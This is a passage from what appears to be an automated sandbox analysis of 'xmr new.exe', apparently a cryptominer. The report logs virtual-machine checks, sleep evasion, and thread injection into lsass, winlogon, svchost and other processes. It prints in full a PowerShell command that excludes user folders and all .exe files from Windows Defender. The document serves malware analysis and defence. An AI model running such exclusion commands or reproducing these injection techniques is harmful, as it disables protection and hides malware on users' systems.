        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep count: 5636 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608Thread sleep count: 4022 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1592Thread sleep count: 249 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1592Thread sleep time: -249000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 5228Thread sleep count: 9876 > 30
        Source: C:\Windows\System32\dwm.exe TID: 5228Thread sleep time: -9876000s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 4108Thread sleep count: 1808 > 30
        Source: C:\Windows\System32\dialer.exe TID: 4108Thread sleep time: -180800s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7084Thread sleep count: 250 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7084Thread sleep time: -250000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep count: 255 > 30
        Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep time: -255000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5956Thread sleep count: 256 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5956Thread sleep time: -256000s >= -30000s
        Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199DCE0 FindFirstFileExW,37_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F5DCE0 FindFirstFileExW,42_2_00000283E0F5DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539CDCE0 FindFirstFileExW,67_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BDDCE0 FindFirstFileExW,68_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD16DCE0 FindFirstFileExW,69_2_000001F2BD16DCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
        Source: dwm.exe, 0000002A.00000000.1550186667.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: lsass.exe, 00000025.00000002.2797579376.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: svchost.exe, 00000028.00000000.1540966403.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000P
        Source: dwm.exe, 0000002A.00000000.1550186667.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: lsass.exe, 00000025.00000000.1535258971.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2796968061.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1540929396.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2795636946.0000014E25213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: svchost.exe, 00000028.00000000.1540966403.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_25-413
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_63-477
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_66-91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
        Source: C:\Windows\System32\dialer.exeCode function: 66_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,66_2_00000001408460F0
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BCD2A4
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000002A29199D2A4
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A291997D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_000002A291997D90
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25EDD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25ED7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25ED7D90
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F5D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000283E0F5D2A4
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F57D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00000283E0F57D90
        Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,65_2_0000000140001160
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001FB539C7D90
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001FB539CD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CBD8BD7D90
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CBD8BDD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001F2BD167D90
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD16D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001F2BD16D2A4

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Adds a directory exclusion to Windows Defender
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Allocates memory in foreign processes
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F385B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2A2911C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E255D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 283E0EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F385BF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2A2919C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E25F00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 283E0F20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FB53990000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F2BD130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 229F8B70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2938BA00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2258F3D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26F54840000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22B76580000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1265E790000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18510D30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200A2B70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F33CBD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FAB73D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D3E96E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2389D0D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22E66FD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A4D6530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20763780000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200FF1A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23CC6130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 266F1070000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26008BB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12E54DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2CF20530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19EA6340000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EC464E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15B351A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C38C460000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DC09A40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C73F910000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1616A5B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181C5E90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18E3AF30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D70B1D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26DA05C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C9B0460000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23A7CF40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184FCB80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CF1CE30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1697C550000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F0FE010000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC093B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C8004E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 118D8250000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27687590000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28FAA0B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: B40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19292570000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221CFED0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E7A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 15DAA130000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 269FBD40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 14A28E00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19605730000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87F1C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20ECB6C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2DA0CB00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2B392000000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23F55C00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E8A07B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2E321250000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19BE8590000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25252F20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 17F90BB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 230C4CC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F970000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E91F9A0000 protect: page execute and read and write
        Contains functionality to inject code into remote processes
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 85B9273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: 911C273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 255D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 85BF273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 919C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25F0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E0F2273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5399273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D8BA273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BD13273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F8B7273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BA0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8F3D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5484273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7658273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E79273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10D3273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2B7273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3CBD273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B73D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E96E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9D0D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66FD273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D653273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6378273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF1A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C613273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F107273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BB273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54DA273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2053273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E9EA273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A634273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C5A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 464E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 351A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C46273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9A4273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3F91273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6A5B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C5E9273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3AF3273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A05C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B046273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CF4273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FCB8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1CE3273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C55273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FE01273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 93B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D825273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8759273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA0B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B4273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9257273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FCE273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CFED273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 73B6273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E7A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA13273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBD4273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 28E0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 573273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7F1C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C03273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99B5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CB6C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CB0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9200273C
